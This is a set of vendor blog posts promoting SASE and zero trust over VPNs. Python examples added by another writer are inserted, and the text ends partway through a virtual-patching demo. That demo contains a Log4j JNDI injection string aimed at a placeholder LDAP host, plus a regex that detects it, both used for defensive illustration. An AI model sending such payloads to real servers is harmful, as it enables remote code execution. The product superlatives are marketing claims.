Trusted Outsiders: Castle-and-moat security assumes that everyone inside the perimeter is trusted, while outsiders are untrusted. However, the growth of remote work means that companies need to find ways to account for trusted users outside of the perimeter, forcing the use of insecure and unscalable VPNs.
The zero trust security model was designed to address the limitations of these legacy security models. Under the zero trust model, all access requests are evaluated independently against least privilege access controls. If a user successfully authenticates, their session is monitored for suspicious or risky activity, enabling potential threats to be shut down early.
94% of companies are in the process of implementing zero trust, making it one of the most common cybersecurity initiatives. Some of the drivers of zero-trust include:
Corporate Security: Data breaches and ransomware infections are common, and, in many cases, are enabled by the remote access solutions (VPNs, RDP, etc.) used to implement perimeter-based security. Zero trust promises to reduce the probability and impact of these security incidents, decreasing enterprise security risk.
Regulatory Compliance: The zero trust security model aligns well with regulators’ goals to protect sensitive information. Implementing zero trust is best practice for compliance now and may be mandatory in future updates of regulations.
Incident Investigation: A zero trust security system tracks all access requests on the corporate network. This audit trail is invaluable when investigating a security incident or demonstrating regulatory compliance.
Greater Visibility: Zero trust’s stronger access control provides granular visibility into access requests. In addition to security applications, this data can also provide insight into how corporate IT assets are being used and inform infrastructure design and investment.
Zero trust overcomes the problems of legacy, perimeter-focused security models. As corporate IT environments expand, cyber threats mature, and regulatory requirements become stricter, it will be a vital part of a mature security policy.
A VPN Can’t Provide Zero Trust
The rise of remote and hybrid work has made secure remote access a vital capability for many organizations. VPNs are a well-established remote access solution, and many organizations turned to them to support their remote employees.
However, while VPNs offer employees secure remote access to the corporate network, they fail to provide crucial capabilities for a zero trust deployment. Some of the ways in which VPNs fall short include:
Access Management: VPNs are designed to provide an authenticated user with full access to the corporate network, simply creating an encrypted tunnel from the user’s machine to the VPN endpoint. Without built-in access controls, VPNs cannot enforce zero trust’s least privilege access policies.
Integrated Security: VPNs have no built-in security capabilities, meaning that traffic must be routed through a full security stack en route to its destination. With corporate assets scattered on-prem and in the cloud, this usually results in traffic being routed to a central location for inspection, increasing network latency.
Optimized Routing: VPNs are point-to-point solutions, which limit the routes that traffic can take and can cause significant latency due to suboptimal routing. This may cause security controls to be bypassed or disabled in favor of improved network performance.
Two of the foundational concepts of zero trust security are access control and monitoring for security issues during an authenticated user’s session. VPNs provide neither of these key capabilities, and their performance and scalability limitations mean that users may attempt to evade or bypass defenses to improve performance and productivity. While zero trust is rapidly becoming essential for corporate cybersecurity, VPNs are ill-suited to implementing a zero trust architecture.
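The contrast drawn above, as an added example that is not from the original post or from any vendor's product: a VPN-style check that admits any authenticated user to the whole corporate range, beside a gateway that evaluates every request against a least-privilege policy, records each decision in an audit trail, and revokes a session after repeated denials. The users, roles, address ranges and the three-denial threshold are assumptions chosen for illustration.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Constructed sample environment (hypothetical users, roles and ranges).
CORPORATE_NET = ip_network("10.0.0.0/8")
USER_ROLES = {"alice": "finance", "bob": "engineer"}
# Least-privilege policy: each role lists the only (network, port) pairs it may reach.
ROLE_POLICY = {
    "finance": [(ip_network("10.20.1.10/32"), 443)],
    "engineer": [(ip_network("10.30.0.0/24"), 22),
                 (ip_network("10.30.0.0/24"), 443)],
}


@dataclass(frozen=True)
class Request:
    user: str
    authenticated: bool
    dest_ip: str
    dest_port: int


def vpn_style_allow(req: Request) -> bool:
    """Perimeter model: authentication alone opens the whole corporate range."""
    return req.authenticated and ip_address(req.dest_ip) in CORPORATE_NET


class ZeroTrustGateway:
    """Evaluates each request independently, default-deny, with an audit trail."""

    def __init__(self, max_denials: int = 3):
        self.max_denials = max_denials      # assumed session-risk threshold
        self.denials = {}                   # user -> denied requests this session
        self.revoked = set()                # users whose session was shut down
        self.audit_log = []                 # one record per access request

    def _decide(self, req: Request):
        if not req.authenticated:
            return False, "not authenticated"
        if req.user in self.revoked:
            return False, "session revoked"
        role = USER_ROLES.get(req.user)
        dest = ip_address(req.dest_ip)
        for net, port in ROLE_POLICY.get(role, []):
            if dest in net and req.dest_port == port:
                return True, f"role {role} permits destination"
        return False, "no policy entry (default deny)"

    def evaluate(self, req: Request) -> bool:
        allowed, reason = self._decide(req)
        # Session monitoring: repeated out-of-policy requests end the session.
        if not allowed and req.authenticated and req.user not in self.revoked:
            self.denials[req.user] = self.denials.get(req.user, 0) + 1
            if self.denials[req.user] >= self.max_denials:
                self.revoked.add(req.user)
                reason += "; session revoked after repeated denials"
        self.audit_log.append({
            "user": req.user,
            "dest": f"{req.dest_ip}:{req.dest_port}",
            "allowed": allowed,
            "reason": reason,
        })
        return allowed


def run_constructed_session():
    """Replay a constructed session for 'alice' through both models."""
    gateway = ZeroTrustGateway()
    session = [
        Request("alice", True, "10.20.1.10", 443),   # her own finance app
        Request("alice", True, "10.30.0.5", 22),     # engineering SSH
        Request("alice", True, "10.30.0.6", 22),     # engineering SSH
        Request("alice", True, "10.40.0.9", 3389),   # unrelated RDP host
        Request("alice", True, "10.20.1.10", 443),   # finance app again
    ]
    results = [(vpn_style_allow(r), gateway.evaluate(r)) for r in session]
    return results, gateway


if __name__ == "__main__":
    results, gateway = run_constructed_session()
    for (vpn, zt), entry in zip(results, gateway.audit_log):
        print(f"{entry['dest']:<18} vpn={vpn!s:<5} zero_trust={zt!s:<5} {entry['reason']}")
```

The VPN-style check allows all five requests, while the gateway allows only the first and leaves a per-request record that can be reviewed during an incident investigation.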
Achieving Zero Trust with SSE and SASE
These two essential capabilities of zero trust — access control and session security monitoring — are the reason why Security Service Edge (SSE) and Secure Access Service Edge (SASE) are ideal for implementing a corporate zero trust program. SASE solutions include zero trust network access (ZTNA) functionality, which provides the ability to enforce least privilege access controls across the corporate WAN.
Alongside ZTNA, SSE and SASE solutions also offer a range of key security functions, including Firewall as a Service (FWaaS), an intrusion prevention system (IPS), a secure web gateway (SWG), and a cloud access security broker (CASB). Converging security functions with access control makes SASE an all-in-one solution for zero trust.
SASE’s design can also eliminate the network performance impacts of security. Deployed as a cloud-native solution on a global network of points of presence (PoPs), SASE can inspect traffic at the nearest PoP before optimally routing it to its destination. Cloud-native design ensures that converged security has the resources required to perform vital security functions without incurring latency.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can support your organization’s zero trust security goals by signing up for a free demo today.
4 Ways Where Remote Access VPNs Fall Short
Secure remote access is a common need for the modern enterprise. While employees almost exclusively worked from the office in the past, this has changed in recent years. The pandemic and the globalization of the workforce mean that organizations may have users connecting and working from all over the world, and these remote users need secure remote access to corporate networks and other resources.
Historically, virtual private networks (VPNs) were the only available solution, and this familiarity has driven many organizations to expand their existing VPN infrastructure as the need for secure remote access has grown. However, VPNs are network solutions that were designed for corporate networks and security models that no longer exist, and cannot provide secure, high-performance network access to a workforce that requires a more modern remote access solution.
Let’s take a closer look at how remote access VPNs fall short:
1. Lack of built-in security/access management
VPNs are designed to provide secure remote access to corporate networks or IT resources. This includes creating an encrypted VPN tunnel between two endpoints — such as a remote employee’s computer and a VPN server on the corporate network — for business traffic to travel over.
While VPNs can protect against eavesdroppers, that’s about all that they can do. They include no built-in access management or security controls beyond requiring a username and password at logon. Protecting the corporate network against any threats that come over the VPN connection — such as those from an infected computer or a compromised user account — or implementing a zero-trust security policy requires additional security solutions deployed behind the VPN endpoint.
2. Geographic constraints
VPNs are designed to connect two points with an encrypted tunnel that network traffic can flow over. Securing corporate network traffic along its entire route requires VPN connections along each leg of that route. Corporate IT environments are becoming more distributed with the growth of cloud computing, remote sites, Internet of Things (IoT) devices, and business use of mobile devices. Securing access to all of the corporate WAN often creates tradeoffs between network performance and security.
VPNs’ lack of built-in security means that security solutions must be deployed behind each VPN server, making it more difficult to directly link every potential traffic source and destination. Instead, many organizations backhaul traffic to the headquarters network for inspection, degrading performance and increasing latency.
3. Inefficient routing
The point-to-point nature of VPN connections means that a VPN connection can only provide secure access to a single location. For example, a user may be able to connect directly and securely to the corporate WAN.
However, corporate networks are increasingly distributed with infrastructure in on-prem data centers and scattered across multi-cloud environments. As a result, VPNs either force users to have VPNs configured for multiple different locations or to accept inefficient network routing that passes through a single VPN terminus en route to their intended destination.
4. Excessive trust in endpoint security
The goal of a VPN is to protect remote users’ network traffic from being intercepted or eavesdropped upon en route to its destination. VPNs don’t inspect the traffic that they carry or perform any access control beyond basic user authentication. As a result, VPNs are overly trusting in the security of the endpoints that they connect.
Some of the threats that VPNs provide no protection against include:
Infected Devices: If a remote employee’s device is compromised with malware, the malware can send traffic over the device’s VPN connection as well. This could allow an attacker to bypass security restrictions and gain access to corporate networks.
BYOD Devices: The rise of remote work has resulted in increased use of personally owned devices for business purposes. These devices can connect to corporate IT assets via VPNs and may be infected with malware or non-compliant with corporate security policies.
Compromised Accounts: VPNs only implement access control in the form of user authentication when setting up a VPN session. If an attacker has compromised a user’s authentication credentials (password, etc.), they can log in as that user and connect to corporate IT assets.
VPNs only secure the connection over which two endpoints are communicating. They’re overly trusting of the endpoints involved in the communication, which can result in malware infections or other threats to corporate assets.
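The gap described in this section, as an added example that is not from the original article: a VPN-style gate that checks only the logon is run beside a per-request decision that also checks least-privilege entitlements, device posture and session risk. The users, apps, posture fields and risk threshold are constructed for illustration and do not represent any product's policy model.

```python
from dataclasses import dataclass
from typing import Dict, Tuple


@dataclass(frozen=True)
class Device:
    managed: bool      # enrolled in corporate management (False for unvetted BYOD)
    edr_healthy: bool  # endpoint agent reports no active malware
    patched: bool      # meets the minimum patch level in corporate policy


@dataclass(frozen=True)
class Request:
    user: str
    authenticated: bool  # credentials were accepted at logon
    device: Device
    app: str             # resource the session is trying to reach
    session_risk: int    # 0-100 score from ongoing session monitoring


# Constructed least-privilege map: the only apps each role needs.
ENTITLEMENTS = {"alice": {"crm", "wiki"}, "bob": {"wiki"}}
RISK_LIMIT = 70  # assumed threshold at which a session is terminated


def vpn_decision(req: Request) -> str:
    """Legacy VPN model: a successful logon is the only access control."""
    return "allow" if req.authenticated else "deny"


def zero_trust_decision(req: Request) -> Tuple[str, str]:
    """Per-request decision; returns (verdict, reason) for the first failed check."""
    if not req.authenticated:
        return "deny", "authentication failed"
    if req.app not in ENTITLEMENTS.get(req.user, set()):
        return "deny", "app is outside the user's least-privilege set"
    if not req.device.edr_healthy:
        return "deny", "device reports active malware"
    if not (req.device.managed and req.device.patched):
        return "deny", "device does not meet corporate policy"
    if req.session_risk >= RISK_LIMIT:
        return "terminate", "session monitoring flagged risky activity"
    return "allow", "all checks passed"


HEALTHY = Device(managed=True, edr_healthy=True, patched=True)

# Constructed scenarios, one per threat listed in the section above.
SCENARIOS = {
    "normal user": Request("alice", True, HEALTHY, "crm", 5),
    "infected device": Request(
        "alice", True, Device(True, False, True), "crm", 5),
    "non-compliant BYOD": Request(
        "bob", True, Device(False, True, False), "wiki", 5),
    "stolen credentials, out-of-role app": Request(
        "bob", True, HEALTHY, "crm", 5),
    "stolen credentials, risky session": Request(
        "bob", True, HEALTHY, "wiki", 90),
    "failed logon": Request("bob", False, HEALTHY, "wiki", 0),
}


def compare() -> Dict[str, Tuple[str, str]]:
    """Map each scenario to (VPN verdict, zero trust verdict)."""
    return {
        name: (vpn_decision(req), zero_trust_decision(req)[0])
        for name, req in SCENARIOS.items()
    }


if __name__ == "__main__":
    for name, req in SCENARIOS.items():
        verdict, reason = zero_trust_decision(req)
        print(f"{name:38} vpn={vpn_decision(req):6} "
              f"zero_trust={verdict:9} ({reason})")
```

Every scenario with a successful logon passes the VPN-style gate; only the per-request decision separates the normal user from the infected device, the non-compliant BYOD device and the misused account.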
Building Secure Remote Access for the Modern Enterprise
VPNs have significant limitations in terms of their performance, usability, and security. While these issues may have been manageable in the past, rapidly evolving corporate networks make them an increasingly unsuitable solution for secure remote access. Relying on legacy remote access VPNs forces companies to make choices between network performance and security.
Organizations looking to modernize their IT infrastructure to better support remote and hybrid work schedules need to replace their VPNs. Secure Access Service Edge (SASE) provides the capabilities that they need, eliminating the limitations of VPNs and providing numerous additional benefits.
With SASE, companies can move security to the network edge, enabling network optimization without sacrificing security. To learn more about how a cutting-edge SASE solution can enhance an organization’s remote access infrastructure, sign up for a free demo of Cato SASE Cloud, the world’s first global SASE platform, today.
December 28, 2022
A CxO’s Guide: Tough Questions to Ask When Moving to SASE
Making the Paradigm Shift
A paradigm shift away from traditional network and security architectures towards a more flexible and highly scalable cloud-native SASE Cloud architecture can be stomach-churning for many CxOs today. However, taking a holistic view of the drivers of this shift will help put things into perspective. Realizing desired outcomes like the reallocation of resources to more strategic initiatives, agility, speed, and scalability can bring about child-like anticipation of how this new world of SASE will feel.
Before CxOs achieve technology nirvana, however, they must take a few logical steps, and asking tough questions to understand the problem statements and desired outcomes is an important part of this. To better frame this picture, we’ve discussed this with a few of our customers to understand their thought processes during their SASE journey.
Define The Problem Statement
Organizations arrive at SASE decisions from different vectors. For some, it’s as easy as upgrading their WAN connectivity and adding better security. For others, it is exploiting a refresh cycle to explore “what’s next”. Whatever the drivers, understanding the true problems is essential for proper outcomes.
A simple problem statement might be, “Our network is a mess, so we need a different approach to this refresh cycle. Do we have the talent to pull it off?” This identifies two problems to solve: network performance and reliability, and the skillset deficit. Another problem statement might be, “Our current tools are too expensive to maintain, and we need more value for the money we spend.” This implies that managing network and security tools means more time spent on mundane support tasks than on strategic projects.
While these statements are rather generic, they are no less real-world for most CxOs. Identifying the true problem statement can be exhausting; however, this is the first step toward understanding the right questions to ask.
“The steep learning curve on our firewalls meant we were not getting value on the high costs we were paying. We needed a simpler, well-designed solution that our teams could more easily learn and manage.”
~ Joel Lee, CIO @ an Asia-Based Construction Firm
Ask The Tough Questions
Determining which questions are relevant enough to influence a buying decision and asking them can also be exhausting. Not all tough questions are relevant questions, and vice versa. Additionally, all questions must derive from the problem statements specific to your business situation. The following were the top questions our CxOs tend to ask:
1. Does this fit our use cases, and what do we need to validate?
“What problems are we trying to solve, and how should we approach this?” By asking this question of their teams, CxOs are basically asking what is not working, why it’s not working, and what success looks like when it is working. On the surface, it seems easy to answer; however, when digging deeper, many organizations find this to be a daunting question because the answer is sometimes a moving target and is almost always subjective.
2. Do we have the right skills?
When moving to a 100% cloud-delivered SASE solution, it is logical to question the level of cloud expertise required. However, a major relief for CxOs is realizing that their teams could easily be trained for a SASE Cloud solution. Additionally, they realize their teams have more time to expand other technical skills that benefit the broader organization. This allowed them to re-frame the question to, “what additional skills can we learn to build a more agile and dynamic IT organization?”
3. SD-WAN makes sense, but SASE? How will all security services be delivered without an on-prem device? What are the penalties/risks if done solely in the cloud?
Traditional appliances fit nicely inside the IT happy place – an on-prem appliance with all configurations close by. So, can we really move all policy enforcement to the cloud? Can a single security policy really give us in-depth threat protection? These questions try to make sense of SASE, highlighted by a fear of the architectural unknown. However, existing complexity is why these CxOs wanted to inject sanity and simplification into their operations. Security-as-a-Service delivered as part of a SASE Cloud made sense for them, knowing they get the right amount of security when needed.
4. What will the deployment journey be like, and how simple will it be?
Traditional infrastructure deployments require appliances everywhere, months and months of deployment and troubleshooting, multiple configurations, and various other risks that may not align with business objectives. This is a common mindset when pursuing SASE, and CxOs want to understand the overall logistics – “Will our network routing be the same? Will our current network settings be obsolete? Where will security sit? How will segmentation work? Is it compatible with my clouds, and how will they connect? Who supports this and how?” This is just a tiny subset of items to understand, intending to set proper expectations.
5. What are the quantitative and qualitative compromises?
CxOs need to understand how to prioritize and find compromises where needed. Traditional costs often exceed the monetary value and can veer into architecture and resource value. So, an effective approach proposed was using the 80/20 rule on compromises – what are my must-have, should-have, and could-have items or features? Answering this begins with knowing where the 80/20 split is. For example, if the solution solves 80% of your problems and leaves 20% unsolved, what is the must-have, should-have, and could-have of the remaining 20%?
How do you determine which is which?
How would you solve the must-haves differently inside the same architecture?
How will you adapt if an architectural could-have unexpectedly evolves into a must-have?
6. How do we get buy-in from the board?
SASE is just as much a strategic conversation as it is an architectural one. How a CxO approaches this – what technical and business use cases they map to, and their risk-mitigation strategy – will determine their overall level of success. So, gaining board-level buy-in was a critical part of their process. There were various resources that helped with these conversations, including ROI models. CxOs can also consult our blog, Talk SASE To Your Board, as another valuable resource that may assist in these conversations.
“What does this convergence look like, and how do we align architecturally to this new model?”
~ Head of IT Infrastructure @ a Global Financial Services Firm
Mitigate Internal Resistance
Any new project that requires a major paradigm shift will generate resistance from business and IT teams. Surprisingly, our panel experienced very little resistance when presenting SASE to their teams. Each anticipated potential resistance to budgets, architecture change, resource allocations, etc. They determined what could and could not be done within those constraints and addressed them far in advance. This helped mitigate any potential resistance and allowed them to ease all concerns about their decision.
What Other CxOs Can Learn
Transitioning to SASE requires time and planning, like any other architecture project. Keys to making this successful include understanding your problem statement, identifying your outcomes, and learning from your peers. This last point is key because SASE projects, while relatively new, are becoming more mainstream, and the following advice should make any SASE journey much smoother.
Planning Your Project
Have a clear vision and seek upfront input from business and technical teams
Have a clear understanding of your “as-is” and “to-be” architecture
Don’t jump on the bandwagon – know your requirements and desired outcomes
Conduct Thorough Research
Do a detailed analysis of the problem, then do your market research
Understand Gartner’s hype cycle, roadmaps, predictions, etc.
Never stop researching solutions until your goals are finalized
You may discover something you needed that you did not realize - extended value
Evaluate The Solution and Vendor
Develop a scoring mechanism to evaluate vendor technology and performance
Understand your compliance requirements (NIST, PCI-DSS, ISO, GDPR, etc.) and how the solution will enable this
Examine their approach to delivering your outcomes, and pay attention to onboarding, training, and ongoing support
Be Confident in Your Decision
Don’t focus solely on costs
Examine the true value of the solution
Understand the extended costs of each solution – SLAs, ongoing maintenance, patching, fixing, scalability, refresh cycles, etc.
Be honest with yourself and your vendor and remain focused on your outcomes.
This approach benefitted our CxOs and guided them toward the Cato SASE Cloud solution.
“Know what you want to achieve upfront, then stay focused but flexible. Pay attention to skills and capacity requirements.”
~ Stuart Hebron, Group CIO, Tes
Make the SASE Decision
SASE is the ultimate business and technology transformation, and embarking upon this journey is an important step that every decision-maker will, understandably, have questions about. Are we compromising on anything? What risks might we face? Do we have the right skill set internally? Is it financially feasible? These are just a few of the key questions CxOs will pose when pursuing SASE. Asking them will provoke critical thinking and more holistic planning that includes all elements of IT and the broader organization. In the end, asking these questions will lead you to the obvious conclusion – a digital transformation platform like the Cato SASE Cloud solution is the best approach to prepare you for continuous business transformation without limitations.
For more advice on deciding which solution is right for your organization, please read this article on evaluating SASE capabilities.
December 27, 2022
Designing the Corporate WAN for the Security Needs of Tomorrow
Technological innovation, an evolving threat landscape, and other factors mean that the security needs of tomorrow may be very different from those of yesterday. However, many organizations are still reliant on security models and solutions designed for IT architectures that are rapidly becoming extinct. Keeping pace with digital transformation and protecting against cyber threats requires a new approach to security and security architecture capable of supporting it.
Cybersecurity is Only Going to Get More Complicated
In many organizations, security teams are understaffed and overwhelmed by their current responsibilities. However, the challenge of securing organizations against cyber threats will only grow more difficult and complex. Some of the main contributors to these challenges include:
Evolving Networks: Corporate networks have grown and evolved rapidly in recent years with the adoption of cloud computing, remote work, and Internet of Things (IoT) and mobile devices. As technology continues to evolve, corporate IT networks will continue to grow larger and more diverse, making them more difficult to monitor, manage, and secure.
Sophisticated Threats: The cyber threat landscape is changing rapidly as demonstrated by the evolution of the ransomware threat and the emergence of a cybercrime service economy. Security teams must develop and deploy defenses against the latest attacks faster than attackers can circumvent them.
Regulatory Requirements: The enactment of the EU’s GDPR kicked off a wave of new data privacy laws, complicating the regulatory landscape. As laws are created and updated, security teams must take action to demonstrate that they are in compliance with the latest requirements.
Complex Policies: Changes in corporate networks, work models, and cyber threats drive the evolution of more complex corporate IT policies. For example, the introduction of bring your own device (BYOD) policies makes it necessary for security teams to enforce these policies and ensure that devices not owned by the company do not place it at risk.
Security teams can’t scale to keep up with their growing responsibilities, especially since a cyber skills gap means that many are already understaffed. Protecting the growing enterprise from the security threats of tomorrow requires a more manageable and maintainable security strategy.
Zero Trust Is a Core Pillar for Balancing Business and Security Needs
A corporate security policy should complement, not conflict with, an organization’s business needs. Corporate security programs should be designed to support business processes and goals such as:
Remote Access: Employees need remote access to corporate resources, but the company needs to ensure that this remote access does not create additional risk to the organization. Corporate security programs should provide secure, high-performance remote access to corporate resources.
Access Management: Access management is essential to managing corporate security risk and maintaining regulatory compliance. Access control policies should allow legitimate users efficient access to corporate resources while preventing unauthorized access.
Compliance: Companies must be able to achieve and demonstrate compliance with a growing array of regulations. This includes global network visibility and security controls that meet regulatory requirements.
A zero trust security architecture provides a logical balance between security and business needs. With zero trust, access is granted to corporate assets on a case-by-case basis with decisions made based on least privilege access principles. This ensures that legitimate users have the access needed to do their jobs while minimizing the impact of compromised accounts and other intrusions. Additionally, authenticated users’ sessions should be monitored and terminated if risky or malicious activity is detected.
However, a zero trust security strategy is only useful if it can be enforced consistently across an organization’s entire corporate WAN without compromising network performance. Traditional, perimeter-focused security strategies — depending on virtual private networks (VPNs) and security appliances — force choices between network performance and security.
Zero Trust Security Requires a Strong, Stable Foundation
The effectiveness of a zero trust architecture depends on the solutions that it is built on. Zero trust must consistently apply access controls and security policies across the entire corporate WAN. If a weak point exists in an organization’s defenses, an attacker can use it as an entry point to gain access to corporate resources.
Implementing consistent security protections across the enterprise can be a significant challenge. The modern corporate WAN is composed of a variety of environments, including on-prem and cloud-based deployments, as well as IoT and mobile devices alongside traditional computers. These varying environments and endpoints affect the security solutions that can be deployed, which can result in a security architecture that suffers from visibility and enforcement gaps and complex management and maintenance.
However, while endpoints may differ across the corporate WAN, the network is mostly consistent regardless of environment. Deploying access management and security controls at the network level makes consistent enforcement of zero trust access controls and security policies possible.
Security Service Edge (SSE) and Secure Access Service Edge (SASE) provide an ideal foundation for a zero trust architecture. They converge zero trust network access (ZTNA) — which offers the access management that zero trust requires — with the tools needed to secure legitimate users’ sessions, including Firewall as a Service (FWaaS), an intrusion prevention system (IPS), a secure web gateway (SWG), and a cloud access security broker (CASB). In SASE solutions, these security functions are combined with built-in network optimization technologies to apply zero trust access controls and enterprise-grade security protection before routing traffic on to where it needs to go.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about how Cato SASE Cloud can help your organization to build a zero trust architecture that grows with the organization by signing up for a free demo today.
December 22, 2022
A True Zero Trust Architecture Requires Security Integration
While zero trust promises reduced exposure to security incidents and data breaches, as well as simplified compliance with regulatory requirements, deploying a zero trust architecture is not as simple as implementing least privilege access controls and replacing legacy virtual private networks (VPNs) with zero trust network access (ZTNA). Effective zero trust security acknowledges that strict access controls will not block all threats and takes steps to manage the security risks of authenticated users.
An integrated security architecture that goes beyond ZTNA is essential for effective zero trust security.
Zero Trust is About More Than Access Controls
Zero trust is a model intended to address the security risks associated with the legacy, perimeter-focused security model. Under this model, insiders — connected directly or via a VPN — are granted unrestricted access to corporate networks, systems, and applications.
Due to the limitations of VPNs, the focus of zero trust discussions is often on controlling users’ access to corporate resources. By strongly authenticating users and implementing the principle of least privilege, which grants users only the access and permissions that are required for their roles, access management can significantly decrease an organization’s security risks.
However, strong user authentication and access control are not enough for zero trust. While zero trust can ensure that only legitimate, authenticated users have access to corporate resources, these users can still pose a threat due to malice, negligence, or compromised devices. Additionally, attackers may target an organization through attack vectors not associated with user accounts, such as exploiting a vulnerable web application. Effective zero trust architectures must have controls in place to address the threats not mitigated by strong access control.
Microsegmentation Limits Corporate Security Risks
Network segmentation is not a new concept. The legacy castle-and-moat security model is designed to segment an organization’s internal, private network from the public Internet. By forcing all traffic crossing this border to flow through network firewalls and other security solutions, organizations prevent some threats from ever reaching their systems.
Microsegmentation is designed to manage the potential damage caused by threats that manage to bypass perimeter-based defenses and gain access to an organization’s internal network. By breaking the enterprise network into multiple small networks, microsegmentation makes it more difficult for a threat to move laterally through an organization’s systems.
The primary goal of zero trust security is to limit the probability and impact of security incidents, but these breaches will still happen. Microsegmentation reduces the impact of these breaches by limiting the systems, applications, and data that an attacker can access without crossing additional security boundaries and subjecting their actions to further inspection.
Microsegmentation Needs More Than Just ZTNA
For many organizations, ZTNA is the cornerstone of their zero trust security strategy. By replacing legacy, insecure VPNs with ZTNA, an organization gains the ability to enforce least-privilege access controls and dramatically reduce the probability and impact of cybersecurity incidents.
However, while ZTNA is an invaluable solution for zero trust security, it’s not enough on its own. ZTNA provides the access controls needed for zero trust, but additional solutions are needed to implement microsegmentation effectively. In addition to ZTNA’s access controls, companies also need to be able to inspect network traffic and block potential threats from crossing network boundaries.
True zero trust security requires multiple solutions, not only ZTNA but also a network firewall and advanced threat prevention capabilities. Ideally, these solutions should be integrated together into a single solution, providing an organization with comprehensive security visibility and management without the complexity and network performance impacts of a sprawl of disparate standalone security solutions.
SSE and SASE Enable Effective Zero Trust Security
Security Service Edge (SSE) and Secure Access Service Edge (SASE) are the ideal solution for implementing a corporate zero trust program.
SSE and SASE converge ZTNA, Firewall as a Service (FWaaS), and Advanced Threat Prevention capabilities (including an Intrusion Prevention System (IPS) and Next-Generation Anti-Malware (NGAM)) within a single solution. Additionally, as a cloud-native security platform, SSE or SASE can be deployed near an organization’s users and devices, minimizing network performance impacts while providing consistent security visibility and policy enforcement across the corporate WAN.
Cato provides the world’s most robust single-vendor SASE platform, converging Cato SD-WAN and a cloud-native security service edge, Cato SSE 360, including ZTNA, SWG, CASB/DLP, and FWaaS into a global cloud service. With over 75 PoPs worldwide, Cato optimizes and secures application access for all users and locations, and is easily managed from a single pane of glass. Learn more about implementing an effective zero trust security program with Cato SASE Cloud by signing up for a free demo today.
December 20, 2022
New Critical Vulnerability Underscores the Need for Virtual Patching
A new vulnerability underscores the need for virtual patching. The vulnerability, found in FortiOS, would allow a Remote Code Execution (RCE) attack on multiple firewall products as well as FortiGate SSL VPN. The vulnerability has reportedly already been exploited by threat actors. Fortinet has issued a patch for this vulnerability.
The vulnerability, which was initially reported on December 9th, received a score of 9.3 (Critical) and Fortinet has confirmed at least one instance of it being exploited.
Any vulnerability in a system is a potential entry point for a threat actor and must be immediately patched, especially critical vulnerabilities like this one. Threat actors have been known to quickly utilize such vulnerabilities and exploit unpatched systems, while in many cases systems remain unpatched for a very long time, giving even the slower-paced adversaries opportunities to exploit them. Vulnerabilities such as Log4j, which coincidentally is “celebrating” its one-year birthday, are still being used by different adversaries to target unpatched systems to gain access into networks. Why? Because patching is so hard.
The Need for Virtual Patching
Having to identify, connect (or physically go to), patch, and test multiple boxes in multiple locations every time a new vulnerability is discovered is no small feat. Organizations need to perform this process very quickly whenever a new vulnerability is discovered as threat actors move quickly on such opportunities.
In addition, adversaries do not shy away from utilizing old vulnerabilities that still work. Log4j is one example but not the only one. CISA addressed this in their “Top Routinely Exploited Vulnerabilities” alert, writing, “CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.”
The solution to this problem is a cloud-based security architecture that allows for virtual patching. Virtual patching is defined by OWASP as “A security policy enforcement layer which prevents the exploitation of a known vulnerability. The virtual patch works since the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of a virtual patch is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.”
Only a cloud-based security solution eliminates the need to patch box-by-box and effectively enables a “mitigate-once-protect-everywhere” patching strategy.
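The enforcement layer in the OWASP definition can be sketched in a few lines. This is an added example, not Cato's code or any vendor's signature: the site names, rule ID, sample requests and the simplified Log4j lookup pattern are all constructed for illustration. One rule deployed at a shared inspection point blocks the request for every backend while the backends themselves stay unmodified.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote

MAX_DECODE_ROUNDS = 3  # bound the work spent on nested percent-encoding


def normalize(value):
    """Percent-decode (bounded) and lowercase, so a rule sees what the
    application would see rather than the encoding used on the wire."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


@dataclass
class Request:
    site: str                      # backend the request is addressed to
    path: str
    headers: dict = field(default_factory=dict)
    body: str = ""

    def fields(self):
        """Every client-controlled part of the transaction."""
        yield "path", self.path
        for name, value in self.headers.items():
            yield "header:" + name, value
        yield "body", self.body


@dataclass
class VirtualPatch:
    rule_id: str                   # constructed label, not a vendor signature ID
    pattern: re.Pattern

    def match(self, req):
        """Return the name of the first matching field, else None."""
        for name, value in req.fields():
            if self.pattern.search(normalize(value)):
                return name
        return None


class EnforcementLayer:
    """Single policy point that traffic for every site passes through."""

    def __init__(self, backends):
        self.backends = backends   # site -> unmodified application handler
        self.patches = []
        self.blocked = []          # audit trail: (site, rule, field)

    def deploy(self, patch):
        self.patches.append(patch)  # one change, in force for all sites

    def handle(self, req):
        for patch in self.patches:
            where = patch.match(req)
            if where is not None:
                self.blocked.append((req.site, patch.rule_id, where))
                return 403, "blocked by " + patch.rule_id
        return self.backends[req.site](req)


# Simplified marker for the Log4j JNDI lookup syntax (illustrative only;
# a production signature covers more variants).
LOG4J_LOOKUP = VirtualPatch("LOG4J-LOOKUP", re.compile(r"\$\{\s*jndi\s*:"))


def demo():
    reached = []                   # requests that got through to an app

    def backend(name):
        def app(req):
            reached.append((name, req.path))
            return 200, name + " ok"
        return app

    sites = ["branch-a", "branch-b", "datacenter"]
    layer = EnforcementLayer({s: backend(s) for s in sites})
    traffic = [                    # constructed sample requests
        Request("branch-a", "/login",
                {"User-Agent": "${jndi:ldap://example.invalid/x}"}),
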